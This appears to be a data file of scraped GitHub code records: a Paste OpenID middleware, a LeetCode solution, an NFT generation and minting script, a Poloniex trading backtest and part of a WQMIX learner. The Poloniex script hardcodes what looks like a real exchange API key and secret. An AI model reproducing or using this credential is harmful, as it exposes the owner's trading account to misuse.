own\nlogin page after verifying the OpenID URL so that you can retain the login\ninformation in your webapp (session, cookies, etc.)::\n\n wsgi_app = open_id.middleware(wsgi_app, '/somewhere/to/store/openid/data',\n login_redirect='/your/login/code')\n\nYour login code should then be configured to retrieve 'paste.auth.open_id' for\nthe users OpenID URL. If this key does not exist, the user has not logged in.\n\nOnce the login is retrieved, it should be saved in your webapp, and the user\nshould be redirected to wherever they would normally go after a successful\nlogin.\n\"\"\"\n\n__all__ = ['AuthOpenIDHandler']\n\nimport cgi\nimport urlparse\nimport re\nimport six\n\nimport paste.request\nfrom paste import httpexceptions\n\ndef quoteattr(s):\n qs = cgi.escape(s, 1)\n return '\"%s\"' % (qs,)\n\n# You may need to manually add the openid package into your\n# python path if you don't have it installed with your system python.\n# If so, uncomment the line below, and change the path where you have\n# Python-OpenID.\n# sys.path.append('/path/to/openid/')\n\nfrom openid.store import filestore\nfrom openid.consumer import consumer\nfrom openid.oidutil import appendArgs\n\nclass AuthOpenIDHandler(object):\n \"\"\"\n This middleware implements OpenID Consumer behavior to authenticate a\n URL against an OpenID Server.\n \"\"\"\n\n def __init__(self, app, data_store_path, auth_prefix='/oid',\n login_redirect=None, catch_401=False,\n url_to_username=None):\n \"\"\"\n Initialize the OpenID middleware\n\n ``app``\n Your WSGI app to call\n\n ``data_store_path``\n Directory to store crypto data in for use with OpenID servers.\n\n ``auth_prefix``\n Location for authentication process/verification\n\n ``login_redirect``\n Location to load after successful process of login\n\n ``catch_401``\n If true, then any 401 responses will turn into open ID login\n requirements.\n\n ``url_to_username``\n A function called like ``url_to_username(environ, url)``, which should\n return a string username. If not given, the URL will be the username.\n \"\"\"\n store = filestore.FileOpenIDStore(data_store_path)\n self.oidconsumer = consumer.OpenIDConsumer(store)\n\n self.app = app\n self.auth_prefix = auth_prefix\n self.data_store_path = data_store_path\n self.login_redirect = login_redirect\n self.catch_401 = catch_401\n self.url_to_username = url_to_username\n\n def __call__(self, environ, start_response):\n if environ['PATH_INFO'].startswith(self.auth_prefix):\n # Let's load everything into a request dict to pass around easier\n request = dict(environ=environ, start=start_response, body=[])\n request['base_url'] = paste.request.construct_url(environ, with_path_info=False,\n with_query_string=False)\n\n path = re.sub(self.auth_prefix, '', environ['PATH_INFO'])\n request['parsed_uri'] = urlparse.urlparse(path)\n request['query'] = dict(paste.request.parse_querystring(environ))\n\n path = request['parsed_uri'][2]\n if path == '/' or not path:\n return self.render(request)\n elif path == '/verify':\n return self.do_verify(request)\n elif path == '/process':\n return self.do_process(request)\n else:\n return self.not_found(request)\n else:\n if self.catch_401:\n return self.catch_401_app_call(environ, start_response)\n return self.app(environ, start_response)\n\n def catch_401_app_call(self, environ, start_response):\n \"\"\"\n Call the application, and redirect if the app returns a 401 response\n \"\"\"\n was_401 = []\n def replacement_start_response(status, headers, exc_info=None):\n if int(status.split(None, 1)) == 401:\n # @@: Do I need to append something to go back to where we\n # came from?\n was_401.append(1)\n def dummy_writer(v):\n pass\n return dummy_writer\n else:\n return start_response(status, headers, exc_info)\n app_iter = self.app(environ, replacement_start_response)\n if was_401:\n try:\n list(app_iter)\n finally:\n if hasattr(app_iter, 'close'):\n app_iter.close()\n redir_url = paste.request.construct_url(environ, with_path_info=False,\n with_query_string=False)\n exc = httpexceptions.HTTPTemporaryRedirect(redir_url)\n return exc.wsgi_application(environ, start_response)\n else:\n return app_iter\n\n def do_verify(self, request):\n \"\"\"Process the form submission, initating OpenID verification.\n \"\"\"\n\n # First, make sure that the user entered something\n openid_url = request['query'].get('openid_url')\n if not openid_url:\n return self.render(request, 'Enter an identity URL to verify.',\n css_class='error', form_contents=openid_url)\n\n oidconsumer = self.oidconsumer\n\n # Then, ask the library to begin the authorization.\n # Here we find out the identity server that will verify the\n # user's identity, and get a token that allows us to\n # communicate securely with the identity server.\n status, info = oidconsumer.beginAuth(openid_url)\n\n # If the URL was unusable (either because of network\n # conditions, a server error, or that the response returned\n # was not an OpenID identity page), the library will return\n # an error code. Let the user know that that URL is unusable.\n if status in [consumer.HTTP_FAILURE, consumer.PARSE_ERROR]:\n if status == consumer.HTTP_FAILURE:\n fmt = 'Failed to retrieve %s'\n else:\n fmt = 'Could not find OpenID information in %s'\n\n message = fmt % (cgi.escape(openid_url),)\n return self.render(request, message, css_class='error', form_contents=openid_url)\n elif status == consumer.SUCCESS:\n # The URL was a valid identity URL. Now we construct a URL\n # that will get us to process the server response. We will\n # need the token from the beginAuth call when processing\n # the response. A cookie or a session object could be used\n # to accomplish this, but for simplicity here we just add\n # it as a query parameter of the return-to URL.\n return_to = self.build_url(request, 'process', token=info.token)\n\n # Now ask the library for the URL to redirect the user to\n # his OpenID server. It is required for security that the\n # return_to URL must be under the specified trust_root. We\n # just use the base_url for this server as a trust root.\n redirect_url = oidconsumer.constructRedirect(\n info, return_to, trust_root=request['base_url'])\n\n # Send the redirect response\n return self.redirect(request, redirect_url)\n else:\n assert False, 'Not reached'\n\n def do_process(self, request):\n \"\"\"Handle the redirect from the OpenID server.\n \"\"\"\n oidconsumer = self.oidconsumer\n\n # retrieve the token from the environment (in this case, the URL)\n token = request['query'].get('token', '')\n\n # Ask the library to check the response that the server sent\n # us. Status is a code indicating the response type. info is\n # either None or a string containing more information about\n # the return type.\n status, info = oidconsumer.completeAuth(token, request['query'])\n\n css_class = 'error'\n openid_url = None\n if status == consumer.FAILURE and info:\n # In the case of failure, if info is non-None, it is the\n # URL that we were verifying. We include it in the error\n # message to help the user figure out what happened.\n openid_url = info\n fmt = \"Verification of %s failed.\"\n message = fmt % (cgi.escape(openid_url),)\n elif status == consumer.SUCCESS:\n # Success means that the transaction completed without\n # error. If info is None, it means that the user cancelled\n # the verification.\n css_class = 'alert'\n if info:\n # This is a successful verification attempt. If this\n # was a real application, we would do our login,\n # comment posting, etc. here.\n openid_url = info\n if self.url_to_username:\n username = self.url_to_username(request['environ'], openid_url)\n else:\n username = openid_url\n if 'paste.auth_tkt.set_user' in request['environ']:\n request['environ']['paste.auth_tkt.set_user'](username)\n if not self.login_redirect:\n fmt = (\"If you had supplied a login redirect path, you would have \"\n \"been redirected there. \"\n \"You have successfully verified %s as your identity.\")\n message = fmt % (cgi.escape(openid_url),)\n else:\n # @@: This stuff doesn't make sense to me; why not a remote redirect?\n request['environ']['paste.auth.open_id'] = openid_url\n request['environ']['PATH_INFO'] = self.login_redirect\n return self.app(request['environ'], request['start'])\n #exc = httpexceptions.HTTPTemporaryRedirect(self.login_redirect)\n #return exc.wsgi_application(request['environ'], request['start'])\n else:\n # cancelled\n message = 'Verification cancelled'\n else:\n # Either we don't understand the code or there is no\n # openid_url included with the error. Give a generic\n # failure message. The library should supply debug\n # information in a log.\n message = 'Verification failed.'\n\n return self.render(request, message, css_class, openid_url)\n\n def build_url(self, request, action, **query):\n \"\"\"Build a URL relative to the server base_url, with the given\n query parameters added.\"\"\"\n base = urlparse.urljoin(request['base_url'], self.auth_prefix + '/' + action)\n return appendArgs(base, query)\n\n def redirect(self, request, redirect_url):\n \"\"\"Send a redirect response to the given URL to the browser.\"\"\"\n response_headers = [('Content-type', 'text/plain'),\n ('Location', redirect_url)]\n request['start']('302 REDIRECT', response_headers)\n return [\"Redirecting to %s\" % redirect_url]\n\n def not_found(self, request):\n \"\"\"Render a page with a 404 return code and a message.\"\"\"\n fmt = 'The path %s was not understood by this server.'\n msg = fmt % (request['parsed_uri'],)\n openid_url = request['query'].get('openid_url')\n return self.render(request, msg, 'error', openid_url, status='404 Not Found')\n\n def render(self, request, message=None, css_class='alert', form_contents=None,\n status='200 OK', title=\"Python OpenID Consumer\"):\n \"\"\"Render a page.\"\"\"\n response_headers = [('Content-type', 'text/html')]\n request['start'](str(status), response_headers)\n\n self.page_header(request, title)\n if message:\n request['body'].append(\"
\" % (css_class,))\n request['body'].append(message)\n request['body'].append(\"
\")\n self.page_footer(request, form_contents)\n return request['body']\n\n def page_header(self, request, title):\n \"\"\"Render the page header\"\"\"\n request['body'].append('''\\\n\n %s\n \n \n

%s

\n

\n This example consumer uses the Python OpenID library. It\n just verifies that the URL that you enter is your identity URL.\n

\n''' % (title, title))\n\n def page_footer(self, request, form_contents):\n \"\"\"Render the page footer\"\"\"\n if not form_contents:\n form_contents = ''\n\n request['body'].append('''\\\n
\n
\n Identity URL:\n \n \n \n
\n \n\n''' % (quoteattr(self.build_url(request, 'verify')), quoteattr(form_contents)))\n\n\nmiddleware = AuthOpenIDHandler\n\ndef make_open_id_middleware(\n app,\n global_conf,\n # Should this default to something, or inherit something from global_conf?:\n data_store_path,\n auth_prefix='/oid',\n login_redirect=None,\n catch_401=False,\n url_to_username=None,\n apply_auth_tkt=False,\n auth_tkt_logout_path=None):\n from paste.deploy.converters import asbool\n from paste.util import import_string\n catch_401 = asbool(catch_401)\n if url_to_username and isinstance(url_to_username, six.string_types):\n url_to_username = import_string.eval_import(url_to_username)\n apply_auth_tkt = asbool(apply_auth_tkt)\n new_app = AuthOpenIDHandler(\n app, data_store_path=data_store_path, auth_prefix=auth_prefix,\n login_redirect=login_redirect, catch_401=catch_401,\n url_to_username=url_to_username or None)\n if apply_auth_tkt:\n from paste.auth import auth_tkt\n new_app = auth_tkt.make_auth_tkt_middleware(\n new_app, global_conf, logout_path=auth_tkt_logout_path)\n return new_app\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/third_party/Paste/paste/auth/open_id.py","file_name":"open_id.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"15864141789","text":"class Solution:\r\n def mctFromLeafValues(self, arr: List[int]) -> int:\r\n res = 0\r\n \r\n while len(arr) >= 2:\r\n minV, idx = sys.maxsize, -1\r\n for i in range(1,len(arr)):\r\n if arr[i] * arr[i-1] < minV:\r\n minV = arr[i] * arr[i-1]\r\n idx = i\r\n res += minV\r\n arr = arr[:idx-1] + [max(arr[idx-1], arr[idx])] + arr[idx+1:]\r\n \r\n return res\r\n","repo_name":"Jahnavi-Chunduru/-CrackYourInternship","sub_path":"min cost tree from leaf values 136.py","file_name":"min cost tree from leaf values 136.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72693197605","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 30 18:42:22 2021\r\n\r\n@author: Danny1\r\n\r\nhttps://threadreaderapp.com/thread/1408091355105087488.html\r\nwith thanks to @vee for the sharing and inspiration\r\nand @squeebo for code review (it was even worse before)\r\n\r\n\"\"\"\r\n\r\n\r\nfrom __future__ import print_function\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom PIL import Image, ImageSequence\r\nimport os\r\nimport ast\r\nimport json\r\n\r\nimport keystore as k # create keystore.py fetching all api and metamask keys\r\n\r\n\r\npaths = []\r\n\r\npath = os.path.join(k.ROOT,'opensea_creatures')\r\n\r\n# requires opensea creatures tutorial image folders stored in above path\r\n# additionally add backgrounds (basic filled images of the same size as other files) - or remove lines below\r\n\r\n# set folder paths to images sequencd from background to foreground\r\npaths.append(os.path.join(path,\"img/background/\"))\r\npaths.append(os.path.join(path,\"img/accessory/\"))\r\npaths.append(os.path.join(path,\"img/bases/\"))\r\npaths.append(os.path.join(path,\"img/eyes/\"))\r\npaths.append(os.path.join(path,\"img/mouths/\"))\r\n\r\n# trait names in order of sequence & reused for trait names\r\nlayer = ['background', 'accessory', 'bases', 'eyes', 'mouths']\r\n\r\n# # read folders for .png filenames and create table to set weights\r\n# # only run when traits are updated/added\r\n# # take the csv and create a table containing _ | weighting\r\n# # example: background_blue | 20 sets a relative weight of 20 to the blue backround\r\n# # (anything weighted 10 will appear half as often while 40 would appear 2x more)\r\n# files = []\r\n# folders = []\r\n\r\n# for (fpath, dirnames, filenames) in os.walk(path + '/img'):\r\n# folders.extend(os.path.join(fpath, name) for name in dirnames)\r\n# files.extend(os.path.join(fpath, name) for name in filenames)\r\n# dataframe = pd.DataFrame(files)\r\n# dataframe = dataframe[dataframe[0].str.endswith('.png')]\r\n# dataframe.to_csv(path + \"\\data1.csv\")\r\n\r\n# load images from folders\r\nlayers = [[]]\r\n\r\n# read weights from a table (built in steps above)\r\ndf = pd.read_excel(path + '/weights.xlsx')\r\n\r\n# loop through each folder and get the path to each image file and store with the appropriate trait\r\n# also store a text code 'attribute' used for testing uniqueness later\r\n# and json dictionary 'trait used to build the metadata file\r\nfor i in range(len(paths)):\r\n files = os.listdir(paths[i])\r\n layers.append([])\r\n for img_name in files:\r\n layers[i].append([(paths[i] + img_name),img_name.replace(\".png\",\"\")])\r\n layers[i] = pd.DataFrame(layers[i], columns = ['image',layer[i]])\r\n layers[i]['attribute'] = layer[i] + '_' + layers[i][layer[i]]\r\n layers[i]['trait'] = '{\\'' + layer[i] + '\\': \\'' + layers[i][layer[i]] + '\\'}'\r\n layers[i] = layers[i].merge(df, how='left', on='attribute')\r\nlayers.pop(len(paths))\r\n \r\n# loop through desired number mint generations\r\n\r\nmint_IDs = []\r\nminted_dicts = []\r\nminted_pngs = []\r\n\r\nwhile (len(mint_IDs) < 5):\r\n \r\n rand_img = []\r\n test_mint = mint_IDs.copy()\r\n\r\n # select random components\r\n r_code = ''\r\n r_dict = {}\r\n\r\n for i in range(len(paths)):\r\n rand_img.append(layers[i].sample(n=1, weights = layers[i]['weight']))\r\n r_code = r_code + '__' + rand_img[i]['attribute'].iloc[0]\r\n r_dict.update(ast.literal_eval(rand_img[i]['trait'].iloc[0]))\r\n \r\n # verify selected combination is not a duplicate (restart if duplicate combo)\r\n \r\n test_mint.append(r_code)\r\n flag = len(set(test_mint)) == len(test_mint)\r\n if (flag):\r\n mint_IDs = test_mint.copy()\r\n minted_dicts.append(r_dict)\r\n else:\r\n continue\r\n \r\n # convert/store valid images\r\n \r\n img_build = []\r\n \r\n for i in range(len(rand_img)):\r\n img_build.append(Image.open(rand_img[i]['image'].iloc[0]))\r\n img_build[i] = img_build[i].convert('RGBA')\r\n \r\n # generate randomly selected image\r\n \r\n new_img = img_build[0]\r\n \r\n for i in range (len(rand_img)):\r\n new_img = Image.alpha_composite(new_img, img_build[i])\r\n \r\n # store local paths for ipfs upload\r\n minted_pngs.append(path + \"/output/mint\" + str(len(mint_IDs)).zfill(3)+'.png')\r\n \r\n new_img.save(minted_pngs[len(mint_IDs)-1])\r\n \r\n \r\n # new_img.show()\r\n\r\n\r\n'''\r\n#######################################\r\n\r\n# SELECT ANIMATION\r\n# ASSEMBLE ANIMATION FRAMES\r\n\r\n#######################################\r\n'''\r\n\r\n # incomplete, but contains steps to add in animation behind each image\r\n \r\n # transparent_foreground = new_img\r\n # # transparent_foreground.show()\r\n # animation = Image.open(path + '\\\\img\\\\animated.png')\r\n # # animation.show()\r\n \r\n # frames = []\r\n # for frame in ImageSequence.Iterator(animation):\r\n # frame = frame.copy()\r\n # frame = frame.convert('RGBA')\r\n # frame = frame.resize(transparent_foreground.size)\r\n # frame = Image.alpha_composite(frame,transparent_foreground)\r\n # # frame.paste(transparent_foreground, transparent_foreground)\r\n # frames.append(frame)\r\n # frames[0].save(path + '\\\\output\\\\mint'+str(len(mint_IDs)).zfill(3)+'.png', save_all=True, append_images=frames[1:])\r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# POST Image Files to IPFS\r\n\r\n#######################################\r\n'''\r\n\r\nimport requests\r\nimport json\r\n\r\npinata = 'https://api.pinata.cloud'\r\n\r\nheaders = {\r\n \"pinata_api_key\": k.PIN_KEY,\r\n \"pinata_secret_api_key\": k.PIN_SECRET,\r\n }\r\n\r\nr_hashes = []\r\n\r\nfor i in minted_pngs:\r\n file = {\"file\":open(i,'rb')}\r\n # upload & pin file to IPFS, receive hash\r\n response = requests.post(pinata + '/pinning/pinFileToIPFS', files = file, headers = headers)\r\n r_hashes.append(response.json()['IpfsHash'])\r\n \r\n \r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# Add Images to JSON & Upload to IPFS\r\n\r\n#######################################\r\n'''\r\n\r\n\r\n# update dictionaries to json\r\nminted_json = minted_dicts.copy()\r\nr_json_hashes = []\r\n\r\nfor i in range(len(minted_json)):\r\n # set item details\r\n desc = 'Opensea Creatures testing'\r\n image = 'ipfs://' + r_hashes[i]\r\n name = 'creature' + str(i+1).zfill(2)\r\n\r\n attributes = []\r\n for x, y in minted_json[i].items():\r\n if x == 'lines':\r\n continue\r\n attributes.append({\"trait_type\": x, \"value\": y})\r\n \r\n # minted_json[i] = json.dumps(minted_json[i])\r\n # minted_json[i] = json.loads('{ \"description\":' + desc + ', \"name\":' + name + ', \"image\":' + image + ', \"attributes\":' + json.dumps(attributes) + '}')\r\n minted_json[i] = {\"description\": desc, \"name\": name, \"image\": image,\"attributes\": attributes}\r\n # minted_json[i] = json.dumps( minted_json[i] )\r\n \r\n # minted_json[i] = json.loads('{ \"description\":' + desc + ', \"name\":' + name + ', \"attributes\":' + json.dumps(attributes) + '}')\r\n with open(path + '\\\\output\\\\mint' + str(i+1).zfill(3) + '.json', 'w') as f:\r\n json.dump(minted_json[i], f)\r\n \r\n # upload & pin file to IPFS, receive hash\r\n response = requests.post(pinata + '/pinning/pinJSONToIPFS', json = minted_json[i], headers = headers)\r\n \r\n r_json_hashes.append(response.json()['IpfsHash'])\r\n\r\n\r\n \r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# Confirm Uploads and Compute Collection Hash for Provenance\r\n\r\n#######################################\r\n'''\r\n\r\n# TO DO confirm uploads\r\n\r\n\r\n# Python program to find SHA256 hash string of a file\r\nimport hashlib\r\n\r\nprov = ''\r\n\r\nfor filename in minted_pngs:\r\n sha256_hash = hashlib.sha256()\r\n with open(filename,\"rb\") as f:\r\n # Read and update hash string value in blocks of 4K\r\n for byte_block in iter(lambda: f.read(4096),b\"\"):\r\n sha256_hash.update(byte_block)\r\n prov = prov + sha256_hash.hexdigest()\r\n \r\nprov = hashlib.sha256(prov.encode('utf-8')).hexdigest()\r\n\r\n\r\n\r\n'''\r\n#######################################\r\n#######################################\r\n# MINT!!!\r\n#######################################\r\n'''\r\n\r\nimport json\r\nimport os\r\nimport time\r\n\r\nimport requests\r\nfrom web3 import Web3\r\n\r\n\r\npath = os.path.join(k.ROOT,'contracts/seaABI.json')\r\n\r\nwith open(path, 'r') as myfile:\r\n data=myfile.read()\r\n\r\nABI = data\r\n\r\n# connect to provider\r\nw3 = Web3(Web3.HTTPProvider(k.ALCH_KEY))\r\n\r\n# set account to owner\r\nowner = k.OWNER\r\nw3.eth.defaultAccount = owner\r\n\r\n# connect to contract\r\ncontract = w3.eth.contract(address = k.CONTRACT, abi = ABI)\r\n\r\n# check contract symbol\r\ncontract.functions.symbol().call()\r\n\r\nnonce = w3.eth.get_transaction_count(owner)\r\n\r\n# loop through items to be minted\r\nfor i in r_json_hashes:\r\n\r\n # set award\r\n receiver = owner\r\n r_hash = i\r\n award = {receiver, r_hash, 'ipfs://'+r_hash}\r\n \r\n transaction = contract.functions.awardItem(receiver, r_hash, 'ipfs://'+r_hash).buildTransaction()\r\n \r\n transaction.update({\"nonce\": nonce})\r\n \r\n signed_tx = w3.eth.account.sign_transaction(transaction, k.TEST_KEY)\r\n \r\n w3.eth.send_raw_transaction(signed_tx.rawTransaction)\r\n \r\n count = 0\r\n ## TO DO\r\n while nonce == w3.eth.get_transaction_count(receiver) and count < 60:\r\n time.sleep(1)\r\n count = count + 1\r\n # wait until transaction registers\r\n\r\n nonce = w3.eth.get_transaction_count(receiver)","repo_name":"danny-one/nft_Test","sub_path":"generation_v2.py","file_name":"generation_v2.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"29484894829","text":"from poloniex import Poloniex\nfrom time import time\nimport sys\nimport numpy as np\nimport matplotlib.dates as md\nimport matplotlib.pyplot as plt\nimport matplotlib.finance as mpf\nfrom matplotlib.dates import DateFormatter, WeekdayLocator,DayLocator, MONDAY\nfrom colorama import Fore, Back, Style\nfrom datetime import datetime\n\nfrom math import pi\nimport pandas as pd\nfrom bokeh.plotting import figure, output_file, show,save\nfrom bokeh.layouts import column\n\npd.set_option('display.width', 300)\n#print(Fore.RED + 'some red text'+Style.RESET_ALL)\npolo = Poloniex('GBC146G1-M9RGA0VT-T5FL729B-P8OTN6SU',\n'a4d44e8e4e4432e9a9a94d66fb17a7b7081858aaeb85c0fdd9b6ebf8a51a7d2fa0160c5db0e55b8d836ba6d64b1c0e324eba164b94278617edd2eec48c09acb7',jsonNums=float)\ncoin_pair=['BTC_ETH','BTC_XRP','BTC_LTC','BTC_ZEC','BTC_ETC','BTC_DGB','BTC_BTS','BTC_LBC','BTC_FCT','BTC_ARDR','BTC_STRAT','BTC_NXT','BTC_STR','BTC_DASH'\n,'BTC_LSK','BTC_SC','BTC_XEM','BTC_STEEM','BTC_GNT','BTC_XMR','BTC_DOGE','BTC_POT','BTC_SYS','BTC_MAID','BTC_GAME','BTC_BURST','BTC_BCN','BTC_REP','BTC_DCR'\n,'BTC_FLDC','BTC_GRC','BTC_EMC2','BTC_VTC','BTC_GNO','BTC_PINK','BTC_RADS','BTC_AMP','BTC_NOTE','BTC_CLAM','BTC_PPC','BTC_NAV','BTC_OMNI','BTC_VIA','BTC_BLK',\n'BTC_XCP','BTC_XBC','BTC_VRC','BTC_RIC','BTC_PASC','BTC_BTCD','BTC_EXP','BTC_SBD','BTC_SJCX','BTC_NEOS','BTC_FLO','BTC_BELA','BTC_NAUT','BTC_XPM','BTC_NMC',\n'BTC_BCY','BTC_XVC','BTC_BTM','BTC_HUC']\n\nmargin_pair=['BTC_ETH','BTC_XRP','BTC_LTC','BTC_BTS','BTC_STR','BTC_FCT','BTC_DASH','BTC_XMR','BTC_DOGE','BTC_MAID','BTC_CLAM']\n\nperiod = polo.MINUTE * 5\ndf = [pd.DataFrame()]*len(margin_pair)\np=[figure()]*len(margin_pair)\nq=[figure()]*len(margin_pair)\noutput_file(\"polo_chart.html\", title=\"Poloniex-即時k線\")\n\nwindow_short = 3\nwindow_long = 5\nSDP = 0.2\nSDN = -0.6\n# for i in range(len(margin_pair)):\nfor i in range(1):\n print(margin_pair[i])\n df[i]=pd.DataFrame(polo.returnChartData(margin_pair[i],period,time()-polo.DAY))\n df[i]['date'] = df[i]['date']+polo.DAY/3 #shift time to UTC+8\n df[i]['date'] = pd.to_datetime(df[i][\"date\"], unit='s')\n\n\n df[i]['short'] = pd.ewma(df[i]['close'],com= window_short )\n df[i]['long'] = pd.rolling_mean(df[i]['close'], window=window_long)\n df[i]['SD']=(df[i].short - df[i].long) / df[i].long * 100\n df[i]['buy'] = df[i]['SD']>SDP\n df[i]['sell'] = df[i]['SD']< SDN\n df[i]['bs'] = df[i].buy != df[i].sell\n trade_index = df[i][df[i]['bs'] == True].index.tolist()\n\n df[i].dropna(inplace=True)\n df[i]['trade'] = pd.DataFrame.diff(df[i].buy[trade_index]*1 + df[i].sell[trade_index]*-1)\n df[i]['trade'].fillna(0,inplace=True)\n df[i]=df[i].drop(['buy','sell','bs'],axis=1)\n print(df[i])\n\n w = (period * 1000) - 5000\n tools = \"pan,wheel_zoom,box_zoom,reset,save,hover\"\n\n p[i] = figure(x_axis_type=\"datetime\", tools=tools, plot_width=1000,plot_height=400, title=margin_pair[i])\n p[i].xaxis.major_label_orientation = pi / 4\n p[i].grid.grid_line_alpha = 2\n inc = df[i].close > df[i].open\n dec = df[i].open > df[i].close\n p[i].segment(df[i].date, df[i].high, df[i].date, df[i].low, color=\"black\")\n\n p[i].vbar(df[i].date[inc], w, df[i].open[inc], df[i].close[inc], fill_color=\"green\", line_color=\"black\")\n p[i].vbar(df[i].date[dec], w, df[i].open[dec], df[i].close[dec], fill_color=\"red\", line_color=\"black\")\n\n p[i].line(df[i].date,df[i].short,color='yellow')\n p[i].line(df[i].date,df[i].long,color='blue')\n trade_index = df[i][df[i]['trade'] ==2].index.tolist()\n p[i].circle(df[i]['date'][trade_index], df[i]['trade'][trade_index]/2*df[i]['weightedAverage'][trade_index]*0.01 +df[i]['weightedAverage'][trade_index] , color='green')\n trade_index = df[i][df[i]['trade'] ==-2].index.tolist()\n p[i].circle(df[i]['date'][trade_index],\n df[i]['trade'][trade_index] / 2 * df[i]['weightedAverage'][trade_index] * 0.01 +\n df[i]['weightedAverage'][trade_index], color='red')\n\ndf_index=df[0].index.tolist()\n\n\nBTC=1\nETH=0\nfee=0\ntrade_time=0\nfor i in df_index:\n if df[0].trade[i] == -2 and ETH>0:\n BTC=ETH*df[0]['close'][i] * 0.9975\n fee = fee + ETH*df[0]['close'][i] * 0.0025\n ETH=0\n trade_time = trade_time + 1\n elif df[0].trade[i] == 2 and BTC>0:\n ETH=BTC/df[0]['close'][i]*0.9975\n fee = fee + BTC * 0.0025\n BTC=0\n trade_time=trade_time+1\nprint(\"BTC %f ETH %f fee %f trade time %f\"%(BTC,ETH,fee,trade_time))\nif ETH>0:\n print(\"Equal BTC %f\"%(ETH * df[0].close[i] * 0.9975))\n#\n# BTC=1\n# BTC_lend=0\n# BTC_Margin=0\n# ETH=0\n# ETH_lend=0\n# ETH_Margin=0\n# trade_time=0\n# fee=0\n# for i in df_index:\n# if df[0].trade[i] == -2: #open Buy Margin && close sell Margin\n# #sell current ETH\n# if BTC_lend >0:\n# BTC_Margin = ETH_Margin * df[0]['close'][i] * 0.9975\n# BTC=BTC_Margin-BTC_lend\n# BTC_Margin = BTC_lend =0\n# #borrow ETH to sell\n# ETH_lend = BTC/df[0]['close'][i] *1.5\n# ETH_Margin = BTC/df[0]['close'][i] *2.5\n# BTC_Margin = ETH_Margin *df[0]['close'][i]*0.9975\n# trade_time=trade_time+1\n# elif df[0].trade[i] == 2:\n# if ETH_lend >0:\n# ETH_Margin = BTC_Margin /df[0]['close'][i] * 0.9975\n# ETH = ETH_Margin -ETH_lend\n# BTC = ETH*df[0]['close'][i]\n# ETH=0\n# BTC_Margin = BTC*2.5\n# BTC_lend = BTC*1.5\n# ETH_Margin = BTC_Margin / df[0]['close'][i] * 0.9975\n# BTC_Margin=0\n#\n# trade_time=trade_time+1\n#\n# print(\"BTC %f\"%BTC)\n# print(\"ETH %f\"%ETH)\n#\n# if ETH>0:\n# print(\"Equal BTC %f\"%(ETH * df[0].close[i] * 0.9975))\n# print(\"Trade time %d\"%trade_time)\n# show(column(p[0]))","repo_name":"notbeloser/Polo_auto_trade","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17194432955","text":"\"\"\"\nWeighted QMIX\nPaper link:\nhttps://proceedings.neurips.cc/paper/2020/file/73a427badebe0e32caa2e1fc7530b7f3-Paper.pdf\nImplementation: Pytorch\nCreator: Wenzhang Liu (liu_wzh@foxmail.com)\n\"\"\"\nfrom xuance_torch.learners import *\n\n\nclass WQMIX_Learner(LearnerMAS):\n def __init__(self,\n config: Namespace,\n policy: nn.Module,\n optimizer: torch.optim.Optimizer,\n scheduler: Optional[torch.optim.lr_scheduler._LRScheduler] = None,\n summary_writer: Optional[SummaryWriter] = None,\n device: Optional[Union[int, str, torch.device]] = None,\n modeldir: str = \"./\",\n gamma: float = 0.99,\n sync_frequency: int = 100\n ):\n self.alpha = config.alpha\n self.gamma = gamma\n self.sync_frequency = sync_frequency\n self.mse_loss = nn.MSELoss()\n super(WQMIX_Learner, self).__init__(config, policy, optimizer, scheduler, summary_writer, device, modeldir)\n\n def update(self, sample):\n self.iterations += 1\n state = torch.Tensor(sample['state']).to(self.device)\n obs = torch.Tensor(sample['obs']).to(self.device)\n actions = torch.Tensor(sample['actions']).to(self.device)\n state_next = torch.Tensor(sample['state_next']).to(self.device)\n obs_next = torch.Tensor(sample['obs_next']).to(self.device)\n rewards = torch.Tensor(sample['rewards']).mean(dim=1).to(self.device)\n terminals = torch.Tensor(sample['terminals']).float().view(-1, self.n_agents, 1).to(self.device)\n agent_mask = torch.Tensor(sample['agent_mask']).float().view(-1, self.n_agents, 1).to(self.device)\n IDs = torch.eye(self.n_agents).unsqueeze(0).expand(self.args.batch_size, -1, -1).to(self.device)\n\n # calculate Q_tot\n _, action_max, q_eval = self.policy(obs, IDs)\n action_max = action_max.unsqueeze(-1)\n q_eval_a = q_eval.gather(-1, actions.long().view([self.args.batch_size, self.n_agents, 1]))\n q_tot_eval = self.policy.Q_tot(q_eval_a * agent_mask, state)\n\n # calculate centralized Q\n q_eval_centralized = self.policy.q_centralized(obs, IDs).gather(-1, action_max.long())\n q_tot_centralized = self.policy.q_feedforward(q_eval_centralized*agent_mask, state)\n\n # calculate y_i\n if self.args.double_q:\n _, action_next_greedy, _ = self.policy(obs_next, IDs)\n action_next_greedy = action_next_greedy.unsqueeze(-1)\n else:\n q_next_eval = self.policy.target_Q(obs_next, IDs)\n action_next_greedy = q_next_eval.argmax(dim=-1, keepdim=True)\n q_eval_next_centralized = self.policy.target_q_centralized(obs_next, IDs).gather(-1, action_next_greedy)\n q_tot_next_centralized = self.policy.target_q_feedforward(q_eval_next_centralized*agent_mask, state_next)\n\n if self.args.consider_terminal_states:\n target_value = rewards + (1 - terminals) * self.args.gamma * q_tot_next_centralized\n else:\n target_value = rewards + self.args.gamma * q_tot_next_centralized\n td_error = q_tot_eval - target_value.detach()\n\n # calculate weights\n ones = torch.ones_like(td_error)\n w = ones * self.alpha\n if self.args.agent == \"CWQMIX\":\n condition_1 = ((action_max == actions.view([-1, self.n_agents, 1])) * agent_mask).all(dim=1)\n condition_2 = target_value > q_tot_centralized\n conditions = condition_1 | condition_2\n w = torch.where(conditions, ones, w)\n elif 